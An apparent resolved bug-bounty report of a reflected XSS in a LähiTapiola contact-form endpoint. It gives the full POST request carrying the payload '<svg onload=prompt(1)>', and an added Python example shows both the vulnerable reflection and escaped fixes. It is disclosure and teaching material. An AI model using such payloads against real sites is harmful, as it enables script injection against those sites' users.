Reflected XSS in LTContactFormReceiver (/cs/Satellite)
Unknown
Vulnerability Details
URL: http://www.lahitapiola.fi/cs/Satellite
POST:
pagename=LahiTapiola/LTContactFormReceiver
&formId=1310385477986
&campaignID=
&lotteryIDList=1
&soaperrorMessage=
&soapServerErrorMessage=
&acceptTermsErrorMessage=<svg onload=prompt(1)>
&radioErrorMessage=
&dropdownErrorMessage=
&constraintErrorMessage=
&restServiceError=
&agreeTerms=2
&contactLahiTapiola=8
&modeOfContact=Toivon%2Byhteydenottoa%2Bpuhelimitse
&phoneRadioChecked=true
&agreementForMarketing=
&dropdownList=
&radioQuestionList=
&dropdownSize=
&radioListSize=
&lt-viesti=abc
&lt-etunimi=abc
&lt-sukunimi=abc
&lt-puhnro=abc
&[email protected]
&lt-lahiosoite=abc
&lt-postinumero=1
&lt-postitoimipaikka=abc
&lt-status=Samoancukie
Describe:
It is a Reflected XSS bug generated by 2 params:
+agreeTerms
+acceptTermsErrorMessage
First I set agreeTerms to a random number to make it error, then I set the XSS payload in acceptTermsErrorMessage to display it in the browser (<svg onload=prompt(1)>).
P/S: Sorry if this bug is self-XSS. I have no idea what self-XSS is, so I googled it and Wikipedia says "Self-XSS operates by tricking users into copying and pasting malicious content into their browsers' web developer console", so maybe only console XSS is self-XSS? https://en.wikipedia.org/wiki/Self-XSS
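To make the two-parameter behaviour concrete, the following is an added Python example (not code from the report or from the site) that models a form receiver reflecting the client-supplied acceptTermsErrorMessage when agreeTerms is rejected, beside the same path with HTML entity encoding and with a server-defined message. The accepted value of agreeTerms, the HTML wrapper and the request body are constructed assumptions.

```python
import html
from urllib.parse import parse_qs

# Constructed body modelled on the report: agreeTerms carries a value the
# receiver does not accept, so the error path runs and echoes the
# client-supplied acceptTermsErrorMessage (payload URL-encoded here).
CONSTRUCTED_BODY = (
    "pagename=LahiTapiola/LTContactFormReceiver&formId=1310385477986"
    "&agreeTerms=2&acceptTermsErrorMessage=%3Csvg%20onload%3Dprompt(1)%3E"
)
ACCEPT_TERMS_OK = "1"          # assumed value meaning "terms accepted"
PAYLOAD = "<svg onload=prompt(1)>"

# Server-owned error text; the client never gets to choose the wording.
SERVER_MESSAGES = {"acceptTerms": "You must accept the terms to continue."}


def params_of(body: str) -> dict:
    """Flatten a URL-encoded form body into single-valued parameters."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_vulnerable(body: str) -> str:
    """Hypothetical reconstruction of the reported behaviour: the error text
    is taken from the request and concatenated into HTML unchanged."""
    p = params_of(body)
    if p.get("agreeTerms") != ACCEPT_TERMS_OK:
        return '<div class="error">' + p.get("acceptTermsErrorMessage", "") + "</div>"
    return "<div>ok</div>"


def render_escaped(body: str) -> str:
    """Minimal fix: keep the parameter but HTML-encode it before emitting,
    so '<' and '>' become entities and no tag is created."""
    p = params_of(body)
    if p.get("agreeTerms") != ACCEPT_TERMS_OK:
        msg = html.escape(p.get("acceptTermsErrorMessage", ""), quote=True)
        return '<div class="error">' + msg + "</div>"
    return "<div>ok</div>"


def render_hardened(body: str) -> str:
    """Preferred fix: the message is chosen server-side by error condition and
    still passes through encoding; the client parameter is ignored."""
    p = params_of(body)
    if p.get("agreeTerms") != ACCEPT_TERMS_OK:
        return '<div class="error">' + html.escape(SERVER_MESSAGES["acceptTerms"]) + "</div>"
    return "<div>ok</div>"


def reflects_payload(rendered: str) -> bool:
    """True when the raw payload survived into the markup."""
    return PAYLOAD in rendered
```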
Report Stats
- Report ID: 172595
- State: Closed
- Substate: resolved
- Upvotes: 6